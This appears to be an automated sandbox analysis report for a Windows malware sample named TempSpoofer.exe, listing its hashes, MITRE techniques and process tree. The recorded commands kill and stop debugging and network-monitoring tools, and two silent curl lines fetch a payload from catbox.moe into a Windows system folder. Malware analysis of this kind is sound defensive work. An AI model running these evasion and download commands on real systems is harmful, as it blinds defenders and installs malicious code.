550b6cbdefab0c183b41f9fa96c8ed0797efaf13081fd6ca745f30670d8725f0

Analysis

max time kernel
149s
max time network
119s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
24-11-2024 01:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

TempSpoofer.exe
Size

80KB
MD5

5374b62745b86ac86e6a4c89921182cd
SHA1

921a4a2d5c6489bc5a0b5697bf19678495dfadbf
SHA256

550b6cbdefab0c183b41f9fa96c8ed0797efaf13081fd6ca745f30670d8725f0
SHA512

e56cb7ebd3be67e94776043f885412e5f42cfc0c258fe9a2f2fe3dd79f115b0416f64df5cfc82fa275ada0787224ece1400a86bd9567f6e014361ef87082461f
SSDEEP

1536:brvp14xgT6UellETcCMUlzLCYzha6a2UWwZyeMcxV6MFae:bbVjnTcCMUZLZBUWwZhMcCMFa

Score

8^/10

evasion execution

Malware Config

Signatures

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	Process
2096	sc.exe
3008	sc.exe
352	sc.exe
1608	sc.exe
276	sc.exe
692	sc.exe
1052	sc.exe
1716	sc.exe
1916	sc.exe
1960	sc.exe
2404	sc.exe
2748	sc.exe
2692	sc.exe
2988	sc.exe

Kills process with taskkill 26 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	Process
1784	taskkill.exe
2184	taskkill.exe
2144	taskkill.exe
1160	taskkill.exe
2168	taskkill.exe
612	taskkill.exe
764	taskkill.exe
1600	taskkill.exe
2820	taskkill.exe
2756	taskkill.exe
1440	taskkill.exe
1840	taskkill.exe
2288	taskkill.exe
2584	taskkill.exe
1540	taskkill.exe
1628	taskkill.exe
2408	taskkill.exe
2632	taskkill.exe
2616	taskkill.exe
1808	taskkill.exe
2356	taskkill.exe
1152	taskkill.exe
2856	taskkill.exe
2764	taskkill.exe
2772	taskkill.exe
1824	taskkill.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

TempSpoofer.exe

pid	Process
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe
2120	TempSpoofer.exe

Suspicious use of AdjustPrivilegeToken 26 IoCs

Processes:

description	pid	Process
Token: SeDebugPrivilege	2408	taskkill.exe
Token: SeDebugPrivilege	2184	taskkill.exe
Token: SeDebugPrivilege	2820	taskkill.exe
Token: SeDebugPrivilege	2756	taskkill.exe
Token: SeDebugPrivilege	2856	taskkill.exe
Token: SeDebugPrivilege	2764	taskkill.exe
Token: SeDebugPrivilege	2632	taskkill.exe
Token: SeDebugPrivilege	2772	taskkill.exe
Token: SeDebugPrivilege	2616	taskkill.exe
Token: SeDebugPrivilege	1808	taskkill.exe
Token: SeDebugPrivilege	2144	taskkill.exe
Token: SeDebugPrivilege	1160	taskkill.exe
Token: SeDebugPrivilege	1440	taskkill.exe
Token: SeDebugPrivilege	1840	taskkill.exe
Token: SeDebugPrivilege	2356	taskkill.exe
Token: SeDebugPrivilege	2288	taskkill.exe
Token: SeDebugPrivilege	1824	taskkill.exe
Token: SeDebugPrivilege	1152	taskkill.exe
Token: SeDebugPrivilege	2168	taskkill.exe
Token: SeDebugPrivilege	2584	taskkill.exe
Token: SeDebugPrivilege	1540	taskkill.exe
Token: SeDebugPrivilege	1600	taskkill.exe
Token: SeDebugPrivilege	612	taskkill.exe
Token: SeDebugPrivilege	764	taskkill.exe
Token: SeDebugPrivilege	1628	taskkill.exe
Token: SeDebugPrivilege	1784	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

TempSpoofer.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	Process	procid_target
PID 2120 wrote to memory of 2324	2120	TempSpoofer.exe	32
PID 2120 wrote to memory of 2324	2120	TempSpoofer.exe	32
PID 2120 wrote to memory of 2324	2120	TempSpoofer.exe	32
PID 2120 wrote to memory of 2396	2120	TempSpoofer.exe	31
PID 2120 wrote to memory of 2396	2120	TempSpoofer.exe	31
PID 2120 wrote to memory of 2396	2120	TempSpoofer.exe	31
PID 2396 wrote to memory of 2408	2396	cmd.exe	33
PID 2396 wrote to memory of 2408	2396	cmd.exe	33
PID 2396 wrote to memory of 2408	2396	cmd.exe	33
PID 2120 wrote to memory of 2336	2120	TempSpoofer.exe	35
PID 2120 wrote to memory of 2336	2120	TempSpoofer.exe	35
PID 2120 wrote to memory of 2336	2120	TempSpoofer.exe	35
PID 2336 wrote to memory of 2184	2336	cmd.exe	36
PID 2336 wrote to memory of 2184	2336	cmd.exe	36
PID 2336 wrote to memory of 2184	2336	cmd.exe	36
PID 2120 wrote to memory of 2460	2120	TempSpoofer.exe	37
PID 2120 wrote to memory of 2460	2120	TempSpoofer.exe	37
PID 2120 wrote to memory of 2460	2120	TempSpoofer.exe	37
PID 2460 wrote to memory of 2748	2460	cmd.exe	38
PID 2460 wrote to memory of 2748	2460	cmd.exe	38
PID 2460 wrote to memory of 2748	2460	cmd.exe	38
PID 2120 wrote to memory of 2804	2120	TempSpoofer.exe	39
PID 2120 wrote to memory of 2804	2120	TempSpoofer.exe	39
PID 2120 wrote to memory of 2804	2120	TempSpoofer.exe	39
PID 2804 wrote to memory of 2820	2804	cmd.exe	40
PID 2804 wrote to memory of 2820	2804	cmd.exe	40
PID 2804 wrote to memory of 2820	2804	cmd.exe	40
PID 2120 wrote to memory of 3052	2120	TempSpoofer.exe	41
PID 2120 wrote to memory of 3052	2120	TempSpoofer.exe	41
PID 2120 wrote to memory of 3052	2120	TempSpoofer.exe	41
PID 3052 wrote to memory of 2756	3052	cmd.exe	42
PID 3052 wrote to memory of 2756	3052	cmd.exe	42
PID 3052 wrote to memory of 2756	3052	cmd.exe	42
PID 2120 wrote to memory of 2860	2120	TempSpoofer.exe	43
PID 2120 wrote to memory of 2860	2120	TempSpoofer.exe	43
PID 2120 wrote to memory of 2860	2120	TempSpoofer.exe	43
PID 2860 wrote to memory of 2856	2860	cmd.exe	44
PID 2860 wrote to memory of 2856	2860	cmd.exe	44
PID 2860 wrote to memory of 2856	2860	cmd.exe	44
PID 2120 wrote to memory of 3044	2120	TempSpoofer.exe	45
PID 2120 wrote to memory of 3044	2120	TempSpoofer.exe	45
PID 2120 wrote to memory of 3044	2120	TempSpoofer.exe	45
PID 3044 wrote to memory of 2764	3044	cmd.exe	46
PID 3044 wrote to memory of 2764	3044	cmd.exe	46
PID 3044 wrote to memory of 2764	3044	cmd.exe	46
PID 2120 wrote to memory of 2944	2120	TempSpoofer.exe	47
PID 2120 wrote to memory of 2944	2120	TempSpoofer.exe	47
PID 2120 wrote to memory of 2944	2120	TempSpoofer.exe	47
PID 2944 wrote to memory of 2632	2944	cmd.exe	48
PID 2944 wrote to memory of 2632	2944	cmd.exe	48
PID 2944 wrote to memory of 2632	2944	cmd.exe	48
PID 2120 wrote to memory of 2776	2120	TempSpoofer.exe	49
PID 2120 wrote to memory of 2776	2120	TempSpoofer.exe	49
PID 2120 wrote to memory of 2776	2120	TempSpoofer.exe	49
PID 2776 wrote to memory of 2772	2776	cmd.exe	50
PID 2776 wrote to memory of 2772	2776	cmd.exe	50
PID 2776 wrote to memory of 2772	2776	cmd.exe	50
PID 2120 wrote to memory of 2608	2120	TempSpoofer.exe	51
PID 2120 wrote to memory of 2608	2120	TempSpoofer.exe	51
PID 2120 wrote to memory of 2608	2120	TempSpoofer.exe	51
PID 2608 wrote to memory of 2616	2608	cmd.exe	52
PID 2608 wrote to memory of 2616	2608	cmd.exe	52
PID 2608 wrote to memory of 2616	2608	cmd.exe	52
PID 2120 wrote to memory of 2680	2120	TempSpoofer.exe	53

C:\Users\Admin\AppData\Local\Temp\TempSpoofer.exe
"C:\Users\Admin\AppData\Local\Temp\TempSpoofer.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2120
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2396
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2408
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/sx1s7p.bin --output C:\Windows\Speech\physmeme.exe
  2⤵
  PID:2324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2336
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2184
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2460
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:2748
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2804
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2820
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3052
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2756
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2860
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2856
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3044
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2764
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2944
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2632
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq rawshark*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2776
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq rawshark*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq charles*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2608
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq charles*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2616
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2680
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ida*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2456
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq ida*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2144
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2592
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1160
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1868
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1440
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:2976
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:3008
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker3 >nul 2>&1
  2⤵
  PID:2140
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker3
    3⤵
    - Launches sc.exe
    PID:1716
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker2 >nul 2>&1
  2⤵
  PID:1636
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker2
    3⤵
    - Launches sc.exe
    PID:1916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker1 >nul 2>&1
  2⤵
  PID:2916
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker1
    3⤵
    - Launches sc.exe
    PID:2692
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop wireshark >nul 2>&1
  2⤵
  PID:864
- - C:\Windows\system32\sc.exe
    sc stop wireshark
    3⤵
    - Launches sc.exe
    PID:1960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop npf >nul 2>&1
  2⤵
  PID:2044
- - C:\Windows\system32\sc.exe
    sc stop npf
    3⤵
    - Launches sc.exe
    PID:1052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:1248
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1840
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:2980
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2356
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:3020
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:2988
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1952
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2288
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:676
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2700
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1152
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
  2⤵
  PID:640
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2168
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1
  2⤵
  PID:448
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2584
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq rawshark*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2588
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq rawshark*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1540
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq charles*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1364
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq charles*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1600
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1652
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:612
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ida*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1832
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq ida*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:764
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1884
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1628
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1336
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:2264
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:276
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker3 >nul 2>&1
  2⤵
  PID:840
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker3
    3⤵
    - Launches sc.exe
    PID:352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker2 >nul 2>&1
  2⤵
  PID:2116
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker2
    3⤵
    - Launches sc.exe
    PID:1608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/acowqp.bin --output C:\Windows\Speech\physmeme.exe
  2⤵
  PID:2440
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker1 >nul 2>&1
  2⤵
  PID:2552
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker1
    3⤵
    - Launches sc.exe
    PID:2096
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop wireshark >nul 2>&1
  2⤵
  PID:2536
- - C:\Windows\system32\sc.exe
    sc stop wireshark
    3⤵
    - Launches sc.exe
    PID:2404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop npf >nul 2>&1
  2⤵
  PID:2280
- - C:\Windows\system32\sc.exe
    sc stop npf
    3⤵
    - Launches sc.exe
    PID:692
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:1816